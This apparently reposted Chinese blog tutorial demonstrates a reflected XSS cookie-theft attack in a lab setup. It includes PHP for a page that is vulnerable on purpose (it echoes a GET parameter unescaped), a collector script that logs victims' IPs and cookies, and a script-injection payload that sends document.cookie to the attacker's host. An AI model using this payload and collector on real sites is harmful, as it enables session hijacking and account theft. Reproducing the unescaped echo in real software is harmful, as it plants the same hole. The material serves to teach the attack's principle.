XSS跨站脚本攻击过程最简单演示
攻击 简单 过程 脚本 演示 XSS 跨站
2023-09-14 09:08:38 时间
转载自https://www.100txy.com/article/86.html
大多数人对于XSS的原理有一个基本认识,这里不再重复,只给出一个能够演示其原理的完整样例。
1 角色分配
有XXS漏洞的网站,IP地址172.16.35.135,PHP为开发语言
受害访问者,IP地址172.16.35.220,浏览器为IE11
黑客的数据接收网站,IP地址172.16.2.192,PHP为开发语言
2 源码实例
2.1 漏洞网站
存在漏洞的URL为:http://172.16.35.135/xss_demo.php
<?php
session_start();
?>
<!doctype html>
<html>
<head>
<title>XSS demo</title>
</head>
<body>
<form>
<input style="width:300px;" type="text" name="address1" value="<?php echo $_GET["address1"]; ?>" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
该网页把用户通过GET发送过来的表单数据,未经处理直接写入返回的html流,这就是XSS漏洞所在。
2.2 黑客接收网站
接收网站的URL为http://172.16.2.192/xss_hacker.php
<?php
$victim = 'XXS得到的 cookie:'. $_SERVER['REMOTE_ADDR']. ':' .$_GET['cookie'];
file_put_contents('xss_victim.txt', $victim);
把受害用户的IP地址和访问漏洞网站时使用的cookie,一起写入xss_victim.txt文件保存备用。
2.3 用户正常访问
用户使用IE11访问网站。现在网站一般都采用session+cookie来保存用户登录信息,网站通过验证cookie来确实是否是合法已登录用户,所以cookie是用户的敏感数据.
3 攻击过程
3.1 黑客准备攻击字符串,构造攻击URL
黑客可以通过各种扫描工具或者人工输入来找到有XSS漏洞的网站URL,然后精心构造攻击字符串。对于本例来说构造出来的字符串为:
"/> <script>window.open("http://172.16.2.192/xss_hacker.php?cookie="+document.cookie);</script><!--
相关文章
- 自动化攻击取证
- 【火绒安全周报】赛米控遭勒索攻击/俄黑客侵入乌国防大学服务器
- 多米尼加共和国政府机构遭受勒索软件攻击
- 攻击Linux防止SYN攻击:简单有效的方法(linux防syn)
- 新闻速读 > McAfee 称疫情期间 52% 被远程攻击的 RDP 用户来自中国,原因是密码太简单
- kali linux入门指南:快速上手攻击与防御(kalilinux使用)
- IP地址伪装攻击Oracle数据库(ip欺骗访问oracle)
- 利用Redis防御SSRF攻击(redis配合ssrf)
- PHP中防止SQL注入攻击和XSS攻击的两个简单方法
- PHP中全面阻止SQL注入式攻击分析小结
- LinuxVPS下简单解决CC攻击的方法
- 几种常见攻击的正则表达式